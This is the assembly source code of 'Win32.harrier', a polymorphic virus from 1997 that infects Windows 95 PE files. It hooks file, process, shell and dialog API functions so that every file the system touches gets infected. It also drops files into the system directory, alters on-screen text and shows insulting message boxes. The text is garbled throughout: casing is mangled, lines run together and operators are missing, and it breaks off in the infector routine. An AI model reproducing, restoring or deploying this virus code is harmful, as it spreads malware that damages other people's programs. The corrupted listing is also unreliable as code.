Win32.harrier.asm


Win32.harrier

Title HDL - The Pretty Pe Polymorphic Virus.

Page 52,130

;

; * ================================================= =================== *

;! (c) 08-Sep-1997Y by Technorat "95-TH Harrier from Darkland"!

; * ================================================= =================== *

;

; Start Coding: 27-Jul-1997Y Ver 2.00A

; Still Coding: 04-Sep-1997Y Ver 2.01A

; Stop Coding:  08-Sep-1997Y Ver 2.01A

; Bug Fixing:   10-Sep-1997Y Ver 2.01b

; Upgrading:    14-Sep-1997Y Ver 2.01B

; Bug Fixing:   17-Sep-1997Y Ver 2.01!

;

;

; Win32 Virus. (C) *TR*SOFT 27-Jul-1997Y

;

; Compatible: MS Windows 95 (v4.0);

; Structure:  Many Levels Polymorphic Style;

; Infector:   Written As Win32 Console Application;

; Infect:     All Files by Type NewEXE (PE);

; Check:      Attributes, Date & Time, IO Errors, Synchronization

; Devil:      Text Strings On Screen, Message Boxes, Help,

;             Control Panel (System Applet);

; Lock:       -=- Nothing -=-

; :           Pretty fucking style;

;

.386; Party goes.

.Model flat, stdcall

% Nomacs

Include ..harrinc.inc.inc.inc

; ------------------------------------------------- ------------

Data section Must Be present. Data Size Must Be Non-Zero.

.DATA

Dumbo DB 'for Fucking Tasm32 TLINK32 Programs!', 0; -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------

.Code

Public StubenTrylabel; Some Definitions

PUBLIC StubimportPlace; Placed Specially

Public imageplace; for Pelinker

Public CurrentPlace

Public Fixupsplace

Public fixupscounter

Public importPlace

Public importlength

Public bufferplace

; ------------------------------------------------- ------------

Maxpathlen = 260

; ------------------------------------------------- ------------

Cr EQU <0DH, 0AH>; Service MacRoses

Ver EQU

Release EQU

Basedon EQU

; ------------------------------------------------- ------------

Stack Memory Addressing MacRoses

Memcommitsz = 38000H; Stack Memory Size

TinymemCommitsz = 2000H; Warning! Depends on

Total Program size.

_VARADDR = 0; Base of Indexing

Var Macro Varname, Vartype

& Varname catstr, <] [ebp]>; defining the new

IF Type Vartype EQ 0; Variable Reference

_VARADDR = _varaddr Vartype

Else

_VARADDR = _Varaddr Type Vartype

ENDIF

ENDM VAR

; ------------------------------------------------- ------------

Binary Include Support

Bfile Macro Ilabel, IFileName, iFilesize

& Ilabel label Byte

_BFILESTART = $

IRPC Char, IFILENAME

DB '& char'

ENDM

DB (ifilesize - ($ -_ bFileStart) DUP (90h)

ENDM BFILE

; ------------------------------------------------- ------------

DebugmodeKey = 0h; defining the debug

IRPC Char, ; Mode Switcher Key

DebugmodeKey = (DebugModeKey XOR & CHAR ') - 1) SHL 1

ENDM

; ------------------------------------------------- --------_ JMP Macro Addr; Macroses That Supports

JMP addr; asmswap scrambling

ENDM _JMP

_Nop macro Addr

ENDM _NOP

; ------------------------------------------------- ------------

Here The Start of Running Code.

Start:; Here Can Be Placed

The Polymorphic Decryptor,

And Will Be Placed!

But Later.

Startcode

; Separator = _JMP

; ------------------------------------------------- ------------

Here The Real Virus Body.

Bodyhere: Pusha: Pusha

NEED AFTER DECRYPTING!

Firstcm: Call SecondCM

XOR EAX, Eax; Some Trash

Ret; Will Never Work !!!

SecondCM: XOR Eax, Eax; Some Another Trash

POP EBX; REAL BODY.

SUB EBX, (Offset Firstcm - Offset Start 5)

XOR Eax, Eax; Wait on Semaphore

Waitinit: Xchg Eax, [EBX] [Offset INITOK - OFFSET START]

OR EAX, EAX

JZ Waitinit

CMP EAX, 2H; OK, All Done.

Je Doneinit

Defcodeline

DB 0BEH

FixUpsplace DD?; Mov ESI, XXXX

BreakcoDeline

Defcodeline

DB 0B9H

FixUpsCounter Dd?; Mov ECX, XXXX

BreakcoDeline

Again: Mov EDI, [EBX ESI]

Add [EBX EDI], EBX; Setup ReloItems

Add ESI, 4H

Dec ECX

Jnz Again

Mov Here, EBX

Mov Eax, StubenTrylabel; Calculate The

Add Eax, EBX; Host Entry Point

Sub Eax, Currentplace; and Place It for Future

Sub Eax, Polymorphsz

Mov Hostip, EAX

Sub EBX, CURRENTPLACE

Sub EBX, POLYMORPHSZ

MOV MEMBASE, EBX

Mov Debug, 0h; Checking for Debug

Call getenvironmentstrings....

New_Key: xor EBX, EBX

New_char: cmp byte ptr [eax], 0H; Calculate Hash from

JE CHECK_KEY; ENV. String

XOR BL, [EAX]

Dec EBX

SHL EBX, 1

INC EAX

JMP New_CHAR

Check_key: CMP EBX, DEBUGMODEKEY; Debug Key Detected?

JNE new_string

OR Debug, -1; Yes!

Push 0H; (??? NOT USED)

Call MessageBeep

Push 40h; Okonly InformationPush Offset Infselfheader

Push offset infenterdebug

Push 0h

Call Messageboxa

JMP BREAK_KEYS

New_String: Inc Eax; NO, Next String

CMP Byte Ptr [EAX], 0H

JNE New_Key

Break_keys:

Mov Eax, Offset KernelName; Setup Import Entries

Mov Edx, Offset Krnlimp; on kernel32 and shell32

MOV ECX, KRNLIMPCNT; and COMDLG32 DLLS

Call setupimport

Mov Eax, Offset ShellName

Mov Edx, Offset Shellimp

MOV ECX, ShellImpcnt

Call setupimport

Mov Eax, Offset Dialogname

Mov Edx, Offset Dialogimp

MOV ECX, Dialogimpcnt

Call setupimport

Mov Eax, Offset UserName; And User32 and GDI32 DLLS

MOV EDX, Offset Userimp

MOV ECX, Userimpcnt

Call setupimport

Mov Eax, Offset GDINAME

Mov Edx, Offset GDIIMP

MOV ECX, GDIIMPCNT

Call setupimport

Mov helpcounter, 0h

MOV WSRET $, 0H; Critical Section End.

Doneinit: Mov Initok, 2H; No Writes in Ram Here !!!

Here Can Be Implement Some Initialization Features.

For example: infecting the export in shell32.dll OR

..................

Push Memcommitsz / 4h

Call AllocstackMem

Lea Eax, ft_struc

Push EAX

Call getSystemTime; Get "Random" Value

CMP Word PTR ft_second, 10h

JNE GO_AWAY

Push 1000h; Okonly SystemModal

Push Offset Infselfheader

Push offset hellomsg

Push 0h

Call MessageBoxa; fuck the society ;-)

GO_AWAY: Lea Eax, Packedtime; Initialize Random Generator

Push Eax; Can Be Performed At

Lea Eax, ft_struc; any time, IT is legal !!!

Push EAX

Call SystemTimetOfiletime

Mov Eax, Packedtime

OR EAX, 1H

Mov randseed, EAX

Mov Eax, 10h; by 1/16 probability

Call Random

OR EAX, EAX

Jnz Noinstalloem

Push maxpathlen

Lea eax, somepath; some nice install ;-)

Push Eax; (About the OEM)

Call GetsystemDirectorya

Push Eaxle Eax, SomePath

Add Eax, [ESP]

MOV EDI, EAX; The Pretty logo file

Mov ESI, Offset Bitmapname

CLD

MOV ECX, Bitmapnamel

REP MOVSB

Push 0h

PUSH 10000000H 80H; FAN, FFRA

Push 2H; CA

Push 0h

Push 1h

PUSH 80000000H 40000000H; GR / GW

Lea Eax, SomePath

Push EAX

Call Createfilea

CMP EAX, -1H; CREATE ERROR!

JE Fail_oem

Push EAX

Push 0h

Lea ECX, Processedbytes

Push ECX

Push harrbtmpfile_sz

Push Offset Bitmapfile

Push EAX

Call writefile

Call Closehandle

Lea Eax, SomePath

Add Eax, [ESP]

Mov Edi, Eax; The Pretty Info File

Mov ESI, Offset Infoname

MOV ECX, Infonamel

REP MOVSB

Push 0h

PUSH 10000000H 80H; FAN, FFRA

Push 2H; CA

Push 0h

Push 1h

PUSH 80000000H 40000000H; GR / GW

Lea Eax, SomePath

Push EAX

Call Createfilea

CMP EAX, -1H; CREATE ERROR!

JE Fail_oem

Push EAX

Push 0h

Lea ECX, Processedbytes

Push ECX

Push Harrinfofile_sz

Push Offset Infofile

Push EAX

Call writefile

Call Closehandle

Fail_oem: POP EAX

Noinstalloem: Push Memcommitsz / 4h

Call FreeStackMem

POPA

JMP Hostip; All Done.

; ------------------------------------------------- ------------

Setupimport: MOV EBX, StubimportPlace; Setup Hostimport

Add ebx, Here

SET_3 $: CMP DWORD PTR [EBX] [3 * 4], 0H; (EDX / ECX, EAX)

JE set_0 $; Corrupt All..

MOV ESI, [EBX] [3 * 4]; Scan Stub Modules

Add ESI, MEMBASE

Mov Edi, EAX

CLD

SET_2 $: Call Cmpuncase; Compare Two Module Chars

JNE SET_1 $

CMP BYTE PTR [EDI] [- 1], 0H

JNE SET_2 $; Names Compared OK.

Call set_mdl $; setup current module.

SET_1 $: Add Ebx, 5 * 4; Next Module..

JMP SET_3 $

SET_0 $: RET; Last Module, All Done.

SET_MDL $: Push Eax

MOV ESI, [EBX]; (Current Module in EBX)

OR ESI, ESI; LOOKUP PRESENT?

JZ SET_MDL_1 $

Add ESI, MEMBASE

XOR EAX, EAX

SET_MDL_0 $: CMP DWORD PTR [ESI], 0H; Last Lookup? JE SET_MDL_1 $

Test DWORD PTR [ESI], 80000000H

JNE SET_MDL_2 $; Ordinal?

PUSH ESI

Mov ESI, [ESI]; Get Name in Module

Add ESI, MEMBASE

Add ESI, 2H

Push Edx

Push ECX

SET_MDL_M0 $: Push ESI

MOV EDI, [EDX] [1 * 4]; Get Self Name To Setup

SET_MDL_M2 $: CALL CMPUNCASE

JNE SET_MDL_M1 $

CMP BYTE PTR [EDI] [- 1], 0H

JNE SET_MDL_M2 $; OK, SETUP THIS Entry

MOV EDI, [EBX] [4 * 4]; PTR to AddRTable

Add Edi, MEMBASE

MOV ESI, [EDI] [EAX]; importValue

Push EDI

Mov EDI, [EDX]; Setup _var

MOV [EDI], ESI

POP EDI

MOV ESI, [EDX] [2 * 4]; Setup ImportValue

MOV [EDI] [EAX], ESI; by iProc

POP ESI

JMP SET_MDL_M3 $

SET_MDL_M1 $: POP ESI

Add EDX, 3 * 4; Next Name in List

Dec ECX

JNZ SET_MDL_M0 $

SET_MDL_M3 $: POP ECX

POP EDX

POP ESI

SET_MDL_2 $: Add ESI, 4; Next Name in Module

Add Eax, 4

JMP SET_MDL_0 $

SET_MDL_1 $: POP EAX

RET

Cmpuncase: push eax; cmpsb (with uncase check)

Lodsb

Call Upcase

MOV AH, Al

XCHG ESI, EDI

Lodsb

Call Upcase

XCHG ESI, EDI

CMP AH, Al

POP EAX

RET

Upcase: CMP Al, 'A'; Upcase The Al Register

JB Upcase_0 $

CMP Al, 'Z'

JA Upcase_0 $

SUB Al, 20h

Upcase_0 $: RET

; ------------------------------------------------- ------------

Kernel32 Infected functions realization.

IcreateFilea: Push EBP; CREATEFILEA

MOV EBP, ESP; OPENS or CREATES

Pusha; the file or other

MOV EDX, [EBP] [8]; Resource (Pipe, Device, ETC)

Mov EBX, Offset NcreateFilea

Call infectbyname

POPA

POP EBP

JMP _CREATEFILEA

Iopenfile: Push EBP; OpenFile

MOV EBP, ESP; OPENS or CREATES

Pusha; the file

Mov Edx, [EBP] [8]; [OBSOLETE]

MOV EBX, Offset Nopenfile

Call infectbyname

POPA

POP EBP

JMP _openfile

Imovefilea: Push EBP; Movefilea

MOV EBP, ESP; MOVES or RENAMES

Pusha; The Filemov Edx, [EBP] [8]

Mov EBX, Offset Nmovefilea

Call infectbyname

POPA

POP EBP

JMP _Movefilea

ImovefileExa: Push EBP; Movefileexa

MOV EBP, ESP; MOVES or RENAMES

Pusha; the file

Mov Edx, [EBP] [8]; [Not supported by '95]

Mov EBX, Offset NMOvefileexa

Call infectbyname

POPA

POP EBP

JMP _Movefileexa

ICopyFilea: Push EBP; CopyFilea

MOV EBP, ESP; Copyes

Pusha; the file

MOV EDX, [EBP] [8]

MOV EBX, Offset NcopyFilea

Call infectbyname

POPA

POP EBP

JMP _CopyFilea

I_LOPEN: Push EBP; _LOPEN

MOV EBP, ESP; OPENS

Pusha; the file

Mov Edx, [EBP] [8]; [OBSOLETE]

MOV EBX, OFFSET N_LOPEN

Call infectbyname

POPA

POP EBP

JMP __lopen

Iwinexec: push ebp; Winexec

MOV EBP, ESP; SPAWNS

Pusha; the file

Mov Edx, [EBP] [8]; [OBSOLETE]

MOV EBX, OFFSET NWINEXEC

Call infectbyname

POPA

POP EBP

JMP _WINEXEC

IcreateProcessa:

Push EBP; CREATEPROCESSA

MOV EBP, ESP; SPAWNS

Pusha; the file

MOV EDX, [EBP] [8]

MOV EBX, Offset NcreateProcessa

Call infectbyname

POPA

POP EBP

JMP _CreateProcessa

ILoadLibrarya: Push EBP; LoadLibrarya

MOV EBP, ESP; LOADS THE

Pusha; Library File

MOV EDX, [EBP] [8]

Mov EBX, Offset NLOADLIBRARYA

Call infectbyname

POPA

POP EBP

JMP _LoadLibrarya

ILoadLibraryExa:

Push ebp; loadinglibraryexa

MOV EBP, ESP; LOADS THE

Pusha; Library File

MOV EDX, [EBP] [8]

Mov EBX, Offset NLOADLIBRARYEXA

Call infectbyname

POPA

POP EBP

JMP _LoadLibraryExa

IFindFirstFilea:

Push DWORD PTR [ESP] [8]

Push DWORD PTR [ESP] [8]

Call_findfirstfilea

CMP EAX, -1

JE FINDFIRST_1 $

Push EBP; FindfirstFilea

MOV EBP, ESP; Searches the

Pusha; first file

MOV EDX, [EBP] [0CH]

Add Edx, 0BH * 4

Mov EBX, Offset NfindFirstFilea

Call infectbyname

POPA

POP EBP

Findfirst_1 $: RET 8H

IFindNextFilea:

Push DWORD PTR [ESP] [8] Push DWORD PTR [ESP] [8]

Call_findnextfilea

OR EAX, EAX

JE FINDNEXT_1 $

Push EBP; FINDNEXTFILEA

MOV EBP, ESP; Searches the

Pusha; Next File

MOV EDX, [EBP] [0CH]

Add Edx, 0BH * 4

Mov EBX, Offset NfindNextFilea

Call infectbyname

POPA

POP EBP

Findnext_1 $: RET 8H

; ------------------------------------------------- ------------

Shell32 Infected Functions Realization.

ISHELLEXECUTEA: PUSH EBP; Shellexecutea

MOV EBP, ESP; OPENS or Prints

Pusha; The Specified File

Mov Edx, [EBP] [10h]; Via Registry

Mov EBX, Offset nshellexecutea

Call infectbyname

POPA

POP EBP

JMP _SHELLEXECUTEA

IsHellexecuteEx:

Push EBP; ShellexecuteEx

MOV EBP, ESP;???

Pusha;

MOV EDX, [EBP] [10h]; [undocumented]

Mov ebx, offset nshellexecuteEx

Call infectbyname

POPA

POP EBP

JMP _SHELLEXECUTEEX

IsHellexecuteExa:

Push EBP; ShellexecuteExa

MOV EBP, ESP;???

Pusha;

MOV EDX, [EBP] [10h]; [undocumented]

Mov EBX, Offset NSHellexecuteExa

Call infectbyname

POPA

POP EBP

JMP _SHELLEXECUTEEXA

Ifindexecutablea:

Push EBP; FINDEXECUTABLEA

MOV EBP, ESP; Searches the

Pusha; DDE Server

MOV EDX, [EBP] [8]; Via Registry

MOV EBX, Offset Nfindexecutablea

Call infectbyname; or DDE Requests

POPA

POP EBP

JMP _FINDEXECUTABLEA

; ------------------------------------------------- ------------

COMDLG32 INFECTED FUNCTIONS Realization.

IgetopenFileName:

Push DWORD PTR [ESP] [4]; GetopenFileNamea

Call _GetopenFileName; Returns the name

Push EBP; of Opening File

MOV EBP, ESP

Pusha

MOV EDX, [EBP] [8]

Mov Edx, [EDX] [7 * 4]

Mov EBX, Offset NgetopenFileNamea

Call infectbyname

POPA

POP EBP

Ret 4h

IgetsaveFileName:

Push DWORD PTR [ESP] [4]; GetsaveFileNamea

Call_getsavefilename; returns the name

Push EBP; of Saving Filemov EBP, ESP

Pusha

MOV EDX, [EBP] [8]

Mov Edx, [EDX] [7 * 4]

Mov EBX, Offset NgetsaveFileNamea

Call infectbyname

POPA

POP EBP

Ret 4h

; ------------------------------------------------- ------------

User32 Infected Functions Realization

IdrawTexta: Push Ebx; Draw Text On Screen

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [5 * 4 4]

Push DWORD PTR [EBX] [4 * 4 4]

MOV ECX, [EBX] [3 * 4 4]

MOV EDX, [EBX] [2 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [1 * 4 4]

Call_Drawtexta

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 5 * 4

IdrawTextexa: Push Ebx; Draw Text On Screen

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [6 * 4 4]

Push DWORD PTR [EBX] [5 * 4 4]

Push DWORD PTR [EBX] [4 * 4 4]

MOV ECX, [EBX] [3 * 4 4]

MOV EDX, [EBX] [2 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [1 * 4 4]

Call_Drawtextexa

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 6 * 4

ITAbbedTextOuta:

Push Ebx; Draw Text On Screen

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [8 * 4 4]

Push DWORD PTR [EBX] [7 * 4 4]

Push DWORD PTR [EBX] [6 * 4 4]

MOV ECX, [EBX] [5 * 4 4]

MOV EDX, [EBX] [4 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [3 * 4 4]

Push DWORD PTR [EBX] [2 * 4 4]

Push DWORD PTR [EBX] [1 * 4 4]

Call_TabbedTextouta

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 8 * 4

IWSPrintfa: CMP WSRET $, 0H; Check Semaphore!

JE WSPRINTF_1 $

JMP_WSPrintfa

WSPRINTF_1 $: Pop WSRET $ PUSH OFFSET WSPRINT_0 $

JMP_Wsprintfa; Format Text String

WSPRINT_0 $: Push WSRET $

Push EBX

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

MOV EDX, [EBX] [1 * 4 4]

MOV ECX, [EBX] [- 4]

Call Convertstr

MOV [EBX] [- 4], ECX

MOV ESI, EDX

MOV EDI, [EBX] [1 * 4 4]

CLD

Call Transfer_Str

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

MOV WSRET $, 0H

RET

WSRET $ DD 0H

IWVSPrintfa: Push Ebx; Format Text String

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [3 * 4 4]

Push DWORD PTR [EBX] [2 * 4 4]

Push DWORD PTR [EBX] [1 * 4 4]

Call_wvsprintfa

MOV EDX, [EBX] [1 * 4 4]

MOV ECX, EAX

Call Convertstr

MOV [EBX] [- 4], ECX

MOV EDI, [EBX] [1 * 4 4]

MOV ESI, EDX

CLD

Call Transfer_Str

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP Eax; Function Result

POP EBX

RET 3 * 4

IgetTabbedTextExtenta:

Push Ebx; Get Text Parameters

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [5 * 4 4]

Push DWORD PTR [EBX] [4 * 4 4]

MOV ECX, [EBX] [3 * 4 4]

MOV EDX, [EBX] [2 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [1 * 4 4]

Call_Gettabbedtextextenta

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 5 * 4

IMessageBoxa: Push Ebx; shows the thing message

MOV EBX, ESP

Push EAX

Pusha

Push Memcommitsz / 4h

Call AllocstackMem

Lea Eax, ft_struc

Push EAX

Call getSystemTime; Get "Random" Value

CMP Word PTR ft_second, 10h

Jae Message_none $

Movzx Eax, Word PTR FT_MilliseConds

SHR EAX, 1

XOR EDX, EDX

Mov ECX, Fuckmsgcounter

Div ECX

SHL EDX, 1

SHL EDX, 1

Add Edx, Offset FuckMessages

Mov Edx, [EDX] Push DWORD PTR [EBX] [4 * 4 4]

Push DWORD PTR [EBX] [3 * 4 4]

Push Edx

Push DWORD PTR [EBX] [1 * 4 4]

Call Messageboxa

MOV [EBX] [- 4H], EAX

Push Memcommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 4 * 4

Message_none $: Push Memcommitsz / 4h; Legal Call

Call FreeStackMem

POPA

POP EAX

POP EBX

JMP_MessageBoxa

Iwinhelpa: Pusha; Calls the Windows

CMP HelpCounter, 10h; Help System

JB WinHLP_0 $

Push 40h; Okonly Information

Push Offset Infselfheader

Push Offset Infgodhelp

Push 0h

Call Messageboxa

POPA

XOR EAX, EAX

RET 4 * 4

WinHLP_0 $: inc HelpCounter; Legal Call

POPA

JMP _WinHelpa

; ------------------------------------------------- ------------

; GDI32 INFECTED FUNCTIONS Realization

ITextOuta: Push Ebx; Draw Text On Screen

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

MOV ECX, [EBX] [5 * 4 4]

MOV EDX, [EBX] [4 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [3 * 4 4]

Push DWORD PTR [EBX] [2 * 4 4]

Push DWORD PTR [EBX] [1 * 4 4]

Call_Textouta

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 5 * 4

IEXTTEXTOUTA: PUSH EBX; Draw Text On Screen

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [8 * 4 4]

MOV ECX, [EBX] [7 * 4 4]

MOV EDX, [EBX] [6 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [5 * 4 4]

Push DWORD PTR [EBX] [4 * 4 4]

Push DWORD PTR [EBX] [3 * 4 4]

Push DWORD PTR [EBX] [2 * 4 4]

Push DWORD PTR [EBX] [1 * 4 4]

Call _extTextouta

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 8 * 4

IgetTexTextentPointa:

Push Ebx; Get Text Parameters

MOV EBX, ESP

Push Eaxpusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [4 * 4 4]

MOV ECX, [EBX] [3 * 4 4]

MOV EDX, [EBX] [2 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [1 * 4 4]

Call_GettexTextentPointa

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 4 * 4

IgetTexTextentPoint32a:

Push Ebx; Get Text Parameters

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [4 * 4 4]

MOV ECX, [EBX] [3 * 4 4]

MOV EDX, [EBX] [2 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [1 * 4 4]

Call _GettextextentPoint32a

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

RET 4 * 4

IgetTexTextentExpointa:

Push Ebx; Get Text Parameters

MOV EBX, ESP

Push EAX

Pusha

Push TinymemCommitsz / 4h

Call AllocstackMem

Push DWORD PTR [EBX] [7 * 4 4]

Push DWORD PTR [EBX] [6 * 4 4]

Push DWORD PTR [EBX] [5 * 4 4]

Push DWORD PTR [EBX] [4 * 4 4]

MOV ECX, [EBX] [3 * 4 4]

MOV EDX, [EBX] [2 * 4 4]

Call Convertstr

Push ECX

Push Edx

Push DWORD PTR [EBX] [1 * 4 4]

Call_GettextExtentExpointa

MOV [EBX] [- 4H], EAX

Push TinymemCommitsz / 4h

Call FreeStackMem

POPA

POP EAX

POP EBX

Ret 7 * 4

; Separetor = _nop

; ------------------------------------------------- ------------

Shellname DB 'Shell32.dll', 0; Name of Import

KernelName DB 'Kernel32.dll', 0; Providers

Dialogname DB 'COMDLG32.DLL', 0

Username DB 'User32.dll', 0

GDinaMe DB 'GDI32.DLL', 0

; ------------------------------------------------- ------------

_Createfilea dd?; Thunk pointers

_Openfile dd?; (Kernel)

_Movefilea dd?

_MOVEFILEXA DD?

_Copyfilea dd?

__lopen dd? _winexec dd?

_Createprocessa dd?

_LoadLibrarya DD?

_LoadLibraryExa DD?

_Findfirstfilea dd?

_Findnextfilea dd?

_SHELLEXECUTEA DD?; (Shell)

_SHELLEXECUTEEX DD?

_SHELLEXECUTEEXA DD?

_Findexecutablea dd?

_GETOPENFILENAMEA DD?; (Commmdlg)

_GetsaveFileNamea DD?

_DRAWTEXTA DD?; (USER)

_DRAWTEXTEXA DD?

_TabbedTextOuta DD?

_wsprintfa dd?

_WVsPrintfa DD?

_GETTABBEDTEXTEXTENTA DD?

_MessageBoxa DD?

_Winhelpa dd?

_TEXTOUTA DD?; (GDI)

_EXTTEXTOUTA DD?

_GettexTextentPointa DD?

_GettextextentPoint32a dd?

_GettexTextenTexPointa DD?

; ------------------------------------------------- ------------

NcreateFilea DB 'Createfilea', 0; Thunk Pointer Names

Nopenfile DB 'OpenFile', 0

Nmovefilea DB 'Movefilea', 0

NmovefileExa DB 'Movefileexa', 0

NcopyFilea DB 'Copyfilea', 0

N_lopen db '_lopen', 0

Nwinexec DB 'Winexec', 0

NcreateProcessa DB 'CreateProcessa', 0

NLOADLIBRARYA DB 'LOADLIBRARYA', 0

NLOADLIBRARYEXA DB 'LOADLIBRARYEXA', 0

Nfindfirstfilea DB 'FindfirstFilea', 0

NFINDNEXTFILEA DB 'FINDNEXTFILEA', 0

NSHELLEXECUTEA DB 'SHELLEXECUTEA', 0

NSHELLEXECUTEEX DB 'Shellexecuteex', 0

NSHELLEXECUTEEXA DB 'SHELLEXECUTEEXA', 0

NFINDEXECUTABLEA DB 'FINDEXECUTABLE', 0

NgetopenFileNamea DB 'getopenfilenamea', 0

Ngetsavefilenamea DB 'getsavefilenamea', 0

NdrawTexta DB 'DrawTexta', 0

NDrawTextexa DB 'DrawTextexa', 0

NTABBEDTEXTOUTA DB 'TabbedTextOuta', 0

NWSPRINTFA DB 'WSPRINTFA', 0

NWVSPRINTFA DB 'WVSPRINTFA', 0

NgetTabbedtextextenta DB 'getTabbedTextExtenta', 0

NMessageBoxa DB 'MessageBoxa', 0

Nwinhelpa DB 'Winhelpa', 0nTextOuta DB 'TextOuta', 0

NextTextOuta DB 'EXTTEXTOUTA', 0

NgettextextentPointa DB 'gettextextentpointa', 0

NgettextextentPoint32a db 'gettextextentpoint32a', 0

NgettextextentExpointa db 'gettextextentexpointa', 0

; ------------------------------------------------- ------------

Defcodeline

KRNLIMP LABEL DWORD

DD offset _createfilea

DD Offset NcreateFilea

DD Offset IcreateFilea

DD offset _openfile

DD Offset Nopenfile

DD Offset Iopenfile

DD Offset _Movefilea

DD Offset NMOVEFilea

DD Offset Imovefilea

DD Offset _Movefileexa

DD Offset Nmovefileexa

DD Offset Imovefileexa

DD offset _copyfilea

DD Offset NcopyFilea

DD Offset icopyfilea

DD offset __lopen

DD offset n_lopen

DD Offset I_lopen

DD Offset _winexec

DD Offset Nwinexec

DD Offset Iwinexec

DD offset _createprocessa

DD Offset NcreateProcessa

DD Offset IcreateProcessa

DD Offset _LoadLibrarya

DD Offset NLOADLIBRARYA

DD Offset iLoadLibrarya

DD Offset _LoadLibraryExa

DD Offset NLOADLIBRARYEXA

DD Offset iLoadLibraryExa

DD offset _findfirstfilea

DD Offset NfindFirstFilea

DD offset ifindfirstfilea

DD offset _findnextfilea

DD Offset NfindNextFilea

DD Offset ifindnexTfilea

KRNLIMPCNT = ($ - offset kRnlimp) / (3 * 4)

BreakcoDeline

Defcodeline

Shellimp Label DWORD

DD Offset _SHELLEXECUTEA

DD offset nshellexecutea

DD Offset ishellexecutea

DD Offset _SHellexecuteEx

DD Offset NSHellexecuteEx

DD Offset ishellexecuteEx

DD Offset _SHellexecuteExa

DD Offset nshellexecuteExa

DD Offset ishellexecuteExa

DD offset _findexecutablea

DD Offset NfINDexecutablea

DD Offset Ifindexecutablea

ShellImpcnt = ($ - offset shellimp) / (3 * 4)

BreakcoDeline

Defcodeline

Dialogimp label dwordddd offset _GetopenFileNamea

DD Offset NgetopenFileNamea

DD Offset IgetopenFileNamea

DD offset _getsavefilenamea

DD Offset NgetsaveFileNamea

DD Offset IgetsaveFileNamea

Dialogimpcnt = ($ - offset dialogimp) / (3 * 4)

BreakcoDeline

Defcodeline

Userimp label dword

DD Offset _DrawTexta

DD Offset NDRAWTEXTA

DD Offset iDrawTexta

DD Offset _Drawtextexa

DD Offset NdrawTextexa

DD Offset iDrawTextexa

DD Offset _TabbedTextouta

DD Offset NTABBEDTEXTOXTATA

DD Offset ItabbedTextouta

DD Offset_wsprintfa

DD Offset NWSPRINTFA

DD Offset IWSPRINTFA

DD Offset_WVsPrintfa

DD Offset NWVSPrintfa

DD Offset IWVSPrintfa

DD Offset _GetTabbedTexTextenta

DD Offset NgetTabbedTextExtenta

DD Offset IgetTabbedTextExtenta

DD Offset _MessageBoxa

DD Offset NMessageBoxa

DD Offset IMESSAGEBOXA

DD Offset _winhelpa

DD Offset Nwinhelpa

DD Offset IwinHelpa

Userimpcnt = ($ - offset userimp) / (3 * 4)

BreakcoDeline

Defcodeline

GDIIMP LABEL DWORD

DD Offset_Textouta

DD Offset NTextouta

DD Offset ITextouta

DD offset _extTextouta

DD Offset NextTextouta

DD Offset IExtTextouta

DD Offset _GettexTextentPointa

DD Offset NgetTexTextentPointa

DD Offset IgetTexTextentPoint

DD Offset _GettextExtentPoint32a

DD Offset NgetTexTextentPoint32a

DD Offset IgetTexTextentPoint32a

DD Offset _GettextextentExpointa

DD Offset NgetTexTextentExpointa

DD Offset IgetTexTextentExpointa

GDIIMPCNT = ($ - offset gdiimp) / (3 * 4)

BreakcoDeline

; Separator = _JMP

; ------------------------------------------------- ------------

Infector Routines

Infectbyname: Push Memcommitsz / 4H

Call AllocstackMem; Infect File by Name in EDX

CMP Debug, 0H; (WHO IN EBX)

